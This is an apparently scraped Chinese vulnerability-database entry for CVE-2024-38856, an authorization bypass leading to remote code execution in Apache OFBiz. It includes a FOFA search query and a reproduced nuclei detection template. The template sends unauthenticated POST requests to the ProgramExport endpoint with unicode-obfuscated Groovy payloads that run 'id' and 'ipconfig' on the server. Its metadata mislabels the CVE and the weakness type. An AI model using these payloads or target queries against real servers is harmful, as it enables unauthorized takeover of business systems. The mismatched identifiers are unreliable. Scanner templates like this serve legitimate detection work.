Apache OFBiz Incorrect Authorization - Remote Code Execution

漏洞信息

漏洞名称： Apache OFBiz Incorrect Authorization - Remote Code Execution

漏洞编号：

• CVE： CVE-2024-38856

漏洞类型： 权限绕过

漏洞等级： 严重

漏洞描述： Apache OFBiz是一个开源的企业资源规划（ERP）系统，广泛应用于企业级服务中，提供包括客户关系管理（CRM）、电子商务、供应链管理（SCM）等功能。由于其灵活性和可扩展性，OFBiz在全球范围内被众多企业采用。该漏洞存在于Apache OFBiz的授权机制中，具体表现为不正确授权漏洞。攻击者可以利用此漏洞，在未授权的情况下，通过特定的HTTP请求执行屏幕渲染代码，前提是屏幕定义未明确检查用户权限，而是依赖于其端点的配置。这种漏洞的技术根源在于系统未能正确验证用户的权限，导致未授权访问和潜在的远程代码执行。此漏洞的严重性在于，攻击者可以远程执行任意代码，可能导致整个系统被完全控制，敏感数据被泄露，甚至服务被中断。由于攻击无需认证，且可以自动化利用，因此对受影响系统的威胁极大。

产品厂商： Apache

产品名称： Apache OFBiz

影响版本： through 18.12.14

搜索语法： app=”Apache_OFBiz”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/e8fcbcfc348ef17d072e29a7acf5f340a0cf4265/http%2Fcves%2F2024%2FCVE-2024-38856.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2024-38856

info:
  name: Apache OFBiz Incorrect Authorization - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  impact: |
    An attacker can exploit this directory traversal vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    cve-id: CVE-2024-32113
    cvss-score: 9.8
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    epss-score: 0.93490
    epss-percentile: 0.99819
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Apache_OFBiz"
    shodan-query: 'title:"OFBiz"'
    product: ofbiz
    vendor: apache
  tags: cve,cve2024,apache,ofbiz,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
        condition: or

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200